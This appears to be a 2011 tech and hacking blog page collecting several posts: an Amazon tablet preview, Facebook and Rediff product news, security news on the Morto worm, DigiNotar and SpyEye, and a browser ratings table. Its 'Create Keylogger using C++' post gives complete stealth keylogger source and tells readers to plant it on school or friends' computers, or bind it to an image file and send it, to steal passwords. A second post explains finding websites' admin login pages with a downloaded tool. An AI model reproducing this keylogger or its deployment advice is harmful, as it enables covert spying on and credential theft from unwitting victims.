Sunday, 30 October 2011

What to expect from Wednesday's Amazon event


In case you missed it, Amazon.com is having a big press event this Wednesday in New York to roll out something new. OK, maybe it's not Apple kind of big. But it's big enough, especially with the smart money on Jeff Bezos unveiling Amazon's much-anticipated Android tablet (leaks suggest it may be called the Kindle Fire), which a lot of anti-Apple folks hope can slow down the iPad juggernaut.Will we see two tablets--a 7-incher and a 10-incher--or just one? If it is a tablet, will it really be branded the "Kindle Fire" or something else? Will there be a new e-ink Kindle? After all, it's been over a year since Amazon introduced the Kindle 3--isn't it time for a new model?
Lots of questions remain, so with that in mind, here's a short preview of what we could see on Wednesday and the odds of each option actually coming to fruition.

The 7-inch Kindle tablet for $249

This is the product that most people expect Amazon to introduce. It's basically Amazon's answer to the Barnes & Noble Nook Color, and though it will look a lot like some of the smaller Android tablets out there (the screen will be LCD, not e-ink), it will have a slick, heavily modified user interface that tightly integrates Amazon's multimedia offerings, including its curated Amazon Appstore for Android, Kindle Store (e-books), Instant Video streaming service, MP3 Store, and Cloud Drive.
Aside from the inviting, "user-friendly" UI, the biggest advantage Amazon's tablet will have over the Nook Color is improved performance with a faster processor (probably single-core, at least 1GHz). There's some talk that Samsung is involved in the manufacturing of the Amazon tablet and we suspect that this will simply be a more affordable version of the Samsung Galaxy Tab minus the built-in camera and any 3G support (the Amazon tablet will most likely be Wi-Fi-only when it launches).
Will it be called a Kindle? Well, according to MG Siegler over at TechCrunch, who says he got a sneak peek at the device, it will be in the Kindle family and some late rumors have Amazon settling on the name Kindle Fire. Siegler described the device as looking similar to the BlackBerry PlayBook, which means it will have a simple, elegant design, with Amazon is doing its best to put an Apple-esque sheen on the device's interface.
Siegler initially reported that Amazon would bundle in a year's worth of Amazon Prime membership (a $79 value) with the purchase of the tablet. That way you'd be able to tap into its "free" Prime Instant video service and stream movies and TV shows on the device. But he's now backed off that claim.
What else? From Siegler's preview, it was unclear whether the tablet would have an expansion slot for more memory, but it seems odd that it wouldn't include one (Siegler says the device he saw had 6GB of internal memory, though that 6GB might have represented "usable memory").
The key here, of course, is price. Amazon has already seen Barnes & Noble's success with the Nook Color at $249, so the reality is that all it has to do is create a better, faster version of the Nook Color for the same price and it will have a winner on its hands. However, we suspect that Amazon will make it very hard to "root" its device with custom Android firmware. Siegler reported that the Android Market wasn't anywhere to be found on the device he saw; just Amazon's Appstore for Android--a "curated" version of the store that offers a smaller selection of the overall universe of Android apps.
Odds of a Kindle tablet: 99 percent



Two tablets (7-incher and 10-incher)

Word is that Amazon wants to avoid competing directly with Apple--at least this year. It's smartly going to test the waters in the less competitive 7-inch arena before it jumps into the 10-inch ring. (Rumors have long persisted that Amazon was developing a 7-inch and 10-inch tablet simultaneously.) While a more expensive 10-incher could still be on deck for 2012, we don't expect Amazon to introduce two tablets at Wednesday's event.
Odds of two tablet announcements: 10 percent



Will Amazon intro a new e-ink model to counter the Nook Touch?
(Credit: Barnes&Noble)

New touch-screen e-ink Kindle/$99 Kindle

After Barnes & Noble, Sony, and Kobo all came out with new touch-based e-ink readers recently, we thought Amazon would counter with its own next-generation e-ink reader for the holiday season.
The other rumor out there is that instead of moving to a touch-screen interface, which costs more to implement, Amazon will put out a new "budget" Kindle that's on par with or slightly better than the existing model but can be manufactured for less, allowing for a sub-$100 price tag.
Alternately, Amazon could also just drop the price on its existing Kindle to $99 (for the Special Offers version that's now $114) and call it a day.
While we definitely prefer the touch-screen interface, and it helps shrink the device by doing away with the keypad, the existing Kindle is a perfectly capable e-reader that has audio support and just recently added e-book library lending.
Odds of a touch-screen e-ink Kindle: 40 percent
Odds of a $99 Kindle: 25 percent


Final thoughts

Over the years, we've gone to several Kindle events, and Amazon usually announces one product at a time. Whether it will be different this time is hard to say, but one thing pointing to the possible launch of an e-ink reader alongside a color-screen LCD tablet is Amazon's recent price drops for its refurbished Kindle units (the Wi-Fi-only version is down to $99 and has been seen as low as $84.99). In the past, at least, that's signaled that a new model is on the way.
We'll know soon enough. CNET will be covering the Amazon press conference live on Wednesday at 7 a.m. PT/10 a.m. ET. If anything else leaks before the event, we'll be sure to post it. Until then, feel free to give your take on Amazon's potential product announcement--or announcements--in the comments section below.

Facebook to shelve Beluga messenger in December


Starting November 11, users of the service will no longer be able to use the software to send messages to others, however they'll still be able to access them. The company is offering users a way to grab an archive of all their chats for posterity's sake, through that tool is not yet functional. On December 15 the service goes dark for good.
The shutdown news comes in conjunction with the fact that Facebook's Messenger app is now offered worldwide in 22 languages, on iOS, Android, and BlackBerry.
"Now that Facebook Messenger is available everywhere, we've decided to stop offering Beluga as a separate service. You can keep using Beluga for now, but we'll be phasing it out over the next few weeks," the company wrote on its site.
Facebook acquired Beluga in March, rolling out its own, nearly identical group chat applicationless than five months later using the same team that made Beluga. At the time of the acquisition, a Facebook representative told CNET that "nothing is going to change for Beluga right now" and that the two apps would remain separate.
Facebook has shelved a number of companies it's acquired over the years, including Drop.io, Divvyshot, and Hot Potato. Of note, Facebook continues to run FriendFeed, a startup it purchased near the end of 2009. FriendFeed co-founder Bret Taylor is currently Facebook's chief technology officer.

Monday, 24 October 2011

Rediff Launches A Twitter-Like Product, Zarabol

Rediff has launched a twitter-like product called Zarabol that works just like Twitter. That is, you share your updates (140 chars), follow people and topics (#hashtags).
zarabol_rediff
Given that quarterly results are to be announced very shortly, I’d assume that Rediff has got something new to talk to its shareholders. Otherwise such products add no value, especially when Rediff has no social graph and engagement is more via comments (on articles) and not within users.

Aside, its a sweet coincidence that Rediff earlier had an IM product called Bol (which was inspired by Yahoo/ICQ chat service) and Zarabol is ofcourse, inspired from Twitter – i.e. move along with the times.

Rediff: The Rising Traffic (?)

And while you thought that Rediff is on a decline (mind share: yes, traffic:?)? Take a look at the latest UV (Unique Visitors) chart
rediff_traffic
What Rediff has done right is creation of semi-porn/crunchy sites (like Bigg Boss5, Vidya Balan’s Photos (Dirty Picture), Kareena Kapoor Photos etc etc) – which helps the site with a lot of SEO. Unlike ‘content farms’ like In.com, Rediff has taken a (proxy) UGC approach (though be assured that a lot of updates on these SEO-driven pages is coming from company’s editorial team) to increase site activity.
From our earlier coverage: Remember Rediff ?
The big jolt, as far as Rediff is concerned – came not so much from a single competitor as it came from the fact that users moved away from portals altogether.. In other words, Rediff, which has tasted success earlier being “India’s Yahoo”, now was caught in the trap of trying to emulate what the Yahoo’s and Google’s of the world were doing. Unfortunately for them, Yahoo, like Rediff, was fighting its own battles anyhow, and Google could afford some experiments on the back of its search success – a luxury that Rediff hardly had. It is not that none of the product ideas above had merit, or should have not been attempted. Its just that as a company, there seemed to be a lack of direction, or coherent strategy.
War Vs. Battle – What is Rediff focused on?

Create Keylogger using C++|Basic Hacking Tutorials Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.


Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.  Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)


Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.



bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.

Learn how to find admin page for like 90% of websites


I can see that many of you is unable or don't know how to find the admin login page for the control panel of a website so i though about writing a little tutorial about the method i use to find admins login pages.............

First of all here are the tools you will need to do the job:
Download here:-

After that download the admin finder:
http://uploading.com/files/b169bm53/admin%2Blogin%2Bfinder%2Bin%2Bperl%2Blanguage.rar/here


Ok now the real work start:
Install the perl tool on your PC. It take few minutes because there lots of files to copy so do not stop it for any reason.

Then extract the admin finder page and copy it to your hard drive partition C:/

Now go to Start > run > and type cmd > press enter

You will get a black dos window.

Type cd\ and press enter
then type admin.pl and press enter

then write the target website and press enter
I will use here my free website at ucoz. Don't try to hack it..........
then choose the type of that website. This tool will work on asp , php , cfm or type any if you don't know what is the type and press enter

 The tool will search for the admin page as it is shown in this picture.

Sunday, 23 October 2011

Windows Remote Desktop Worm “Morto” Spreading

F-Secure Lab just found a new Internet worm, and it’s spreading in the wild. The worm is called Morto and it infects Windows workstations and servers. It uses a new spreading vector that we haven’t seen before: RDP (Remote Desktop Protocol). Windows has built-in support for this protocol via Windows Remote Desktop Connection. Once you enable a computer for remote use, you can use any other computer to access it.
Windows Remote Desktop Worm Morto
When you connect to another computer with this tool, you can remotely use the computer, just like you’d use a local computer.
Windows Remote Desktop Worm Morto
Once a machine gets infected, the Morto worm starts scanning the local network for machines that have Remote Desktop Connection enabled. This creates a lot of traffic for port 3389/TCP, which is the RDP port.
When Morto finds a Remote Desktop server, it tries logging in as Administrator and tries a series of passwords:
admin
password
server
test
user
pass
letmein
1234qwer
1q2w3e
1qaz2wsx
aaa
abc123
…….
………..
Once you are connected to a remote system, you can access the drives of that server via Windows shares such as \\tsclient\c and \\tsclient\d for drives C: and D:, respectively. Morto uses this feature to copy itself to the target machine. It does this by creating a temporary drive under letter A: and copying a file called a.dll to it.
The infection will create several new files on the system including \windows\system32\sens32.dll and
\windows\offline web pages\cache.txt.
Morto can be controlled remotely. This is done via several alternative servers, including jaifr.com and qfsl.net.
F-Secure Lab detected Morto components as Backdoor:W32/Morto.A and Worm:W32/Morto.B.

Hackers Acquire Google Certificate, Could Hijack Gmail Accounts


Hackers have obtained a digital certificate good for any Google website from a Dutch certificate provider.
Google SSL Certificate
Criminals could use the certificate to conduct “man-in-the-middle” attacks targeting users of Gmail, Google’s search engine or any other service.
Attackers could poison DNS, present their site with the fake cert and bingo, they have the user’s credentials.
Man-in-the-middle attacks could also be launched via spam messages with links leading to a site posing as, say, the real Gmail. If recipients surfed to that link, their account login username and password could be hijacked.
Details of the certificate were posted on Pastebin last Saturday.
The SSL certificate is valid, and was issued by DigiNotar, a Dutch certificate authority, or CA.
It’s unclear whether the certificate was obtained because of a lack of oversight by DigiNotar or through a breach of the company’s certificate issuing website.
Given their ties to the government and financial sectors it’s extremely important to find out the scope of the breach as quickly as possible. The situation was reminiscent of a breach last March, when a hacker obtained certificates for some of the Web’s biggest sites, including Google and Gmail, Microsoft, Skype and Yahoo.
Then, Comodo said that nine certificates had been fraudulently issued after attackers used an account assigned to a company partner in southern Europe.
Initially, Comodo argued that Iran’s government may have been involved in the theft. Days later, however, a solo Iranian hacker claimed responsibility for stealing the SSL certificates.

EPPB – BlackBerry, iPhone Password Recovery Tool


EPPBElcomsoft Phone Password Breaker (EPPB) enables forensic access to password-protected backups for smartphones and portable devices based on RIM BlackBerry and Apple iOS platforms. The password recovery tool supports all Blackberry smartphones as well as Apple devices running iOS including iPhone, iPad and iPod Touch devices of all generations released to date, including the latest iPhone 4 and iOS 4.3.
The new tool recovers the original plain-text passwords protecting encrypted backups for Apple and BlackBerry devices. The backups contain address books, call logs, SMS archives, calendars and other organizer data, camera snapshots, voice mail and email account settings, applications, Web browsing history and cache.
But, there is a catch. The new feature requires Media Card encryption to be switched on and set to either “Security Password” or “Device Password” mode. If this condition is met, EPPB will be able to run password recovery against device security password. What is also important and rather exciting is that you don’t need the BlackBerry device itself. All that is needed is a media card that was used in that device. Actually, that only need one specific file from that media card, so yes, the recovery can be off-loaded and the password can be recovered offline.

SpyEye Banking Trojan – Now with SMS Hijacking Capability


SpyEye TrojanThe Trusteer research team recently uncovered a stealth new attack carried out by the SpyEye Trojan that circumvents mobile SMS (short message service) security measures implemented by many banks. Using code captured while protecting a Rapport user, researchers discovered a two-step web-based attack that allows fraudsters to change the mobile phone number in a victim’s online banking account and reroute SMS confirmation codes used to verify online transactions. This attack, when successful, enables the thieves to make transactions on the user’s account and confirm the transactions without the user’s knowledge.
Step 1:
In the first step of the attack, SpyEye steals the victim’s online banking login details. This is standard operating procedure for financial malware like SpyEye, Zeus, and others. The fraudsters can now access the victim’s account without raising any red flags that would be picked up by fraud detection systems.
Step 2:
In Step 2, SpyEye changes the victim’s phone number of record in the online banking application to one of several random attacker controlled numbers. In order to complete this operation the attacker needs the confirmation code which is sent by the bank to the customer’s original phone number. To steal this confirmation code the attacker uses the following social engineering scheme.
First, SpyEye injects a fraudulent page in the customer’s browser that appears to be from the online banking application. The fake page purports to introduce a new security system that is now “required” by the bank and for which customers must register. The page explains that under this new security process the customer will be assigned a unique telephone number and that they will receive a special SIM card via mail. Next, the user is instructed to enter the personal confirmation number they receive on their mobile telephone into the fake web page in order to complete the registration process for the new security system. This allows the criminals to steal the confirmation code they need to authorize changing the customer’s mobile number.
Now the fraudsters can receive all future SMS transaction verification codes for the hijacked account via their own telephone network. This allows them to use the SMS confirmation system to divert funds from the customer’s account without their knowledge, while not triggering any fraud detection alarms.

Saturday, 22 October 2011

2011 INTERNET BROWSER RATINGS


Rank #1#2#3#4#5#6#7#8#9#10
Excellent score   Excellent
Very good score   Very Good
Good score   Good
Fair score   Fair
Poor score   Poor
Firefox Google Chrome Internet Explorer Opera Safari Maxthon Avant Browser PhaseOut Deepnet Explorer SpaceTime
Firefox Google Chrome Internet Explorer Opera Safari Maxthon Avant Browser PhaseOut Deepnet Explorer SpaceTime






Read Review
Read Review
Read Review
Read Review
Read Review

 
Overall Rating Excellent Excellent Excellent Very Good Very Good Very Good Very Good Very Good Good Good
Ratings
Feature Set Excellent Excellent Excellent Excellent Very Good Very Good Very Good Very Good Good Good
Ease of Use Excellent Excellent Excellent Very Good Excellent Very Good Very Good Very Good Very Good Good
Security Excellent Excellent Excellent Excellent Very Good Very Good Good Excellent Good Good
Speed & Compatibility Excellent Excellent Excellent Very Good Excellent Excellent Excellent Good Good Very Good
Help/Support Excellent Excellent Excellent Excellent Excellent Excellent Good Good Very Good Very Good
View Specifications Go! Go! Go! Go! Go! Go! Go! Go! Go! Go!
View Screenshots View Firefox screenshots View Google Chrome screenshots View Internet Explorer screenshots View Opera screenshots View Safari screenshots View Maxthon screenshots View Avant Browser screenshots View PhaseOut screenshots View Deepnet Explorer screenshots View SpaceTime screenshots
Speed
Initial Startup Time 14 8.1 8.5 7.1 10.6 7 25.7 21.3 11.6 14.6
Average Startup Time 3.8 3.1 2.2 4.4 3.7 6.4 11 10.7 7.8 11.5
Navigation Time 6.4 7 7.4 7.3 7.8 8 6.4 8.8 6.3 13.5
Features
Tabbed Browsing Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Integrated Search Engine Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Smart Toolbar Check Mark Check Mark Check Mark Check Mark Check Mark      
Save Tabs Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark  
Customize Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark  
Frequently Visited Webpages List Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
RSS Feeds Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark  
Automatic Updates Check Mark Check Mark Check Mark Check Mark Check Mark    Check Mark   
Password Manager Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark    
Find On Page Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Zoom Check Mark Check Mark Check Mark Check Mark   Check Mark Check Mark Check Mark Check Mark Check Mark
Parental Controls Check Mark   Check Mark        
Add-ons Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark  
Spell Check Check Mark Check Mark   Check Mark Check Mark      
Open Source Development Check Mark Check Mark         
Seamless Download Manager Check Mark Check Mark   Check Mark       
Thumbnail Preview   Check Mark Check Mark Check Mark     Check Mark   Check Mark
Synchronize   Check Mark Check Mark Check Mark   Check Mark     
Mouse Gestures     Check Mark   Check Mark Check Mark   Check Mark  
Voice Interaction     Check Mark       
Security
Pop-up Block Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark  
Anti-Spyware Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark   
Anti-Virus Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark   
Anti-Phishing Check Mark Check Mark Check Mark Check Mark     Check Mark Check Mark  
Clear History Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Private Mode Check Mark Check Mark Check Mark        
Technical Help/Support
Email Support Check Mark   Check Mark Check Mark   Check Mark Check Mark Check Mark Check Mark Check Mark
Online Help Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark  
Tutorials Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark     
User Manual/User Guide Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark    Check Mark Check Mark
FAQs Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
User Forums Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark   Check Mark Check Mark
Telephone Support    Check Mark        
Supported Configurations
Windows 7 Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Windows Vista Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Windows XP Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark Check Mark
Mac Check Mark Check Mark   Check Mark Check Mark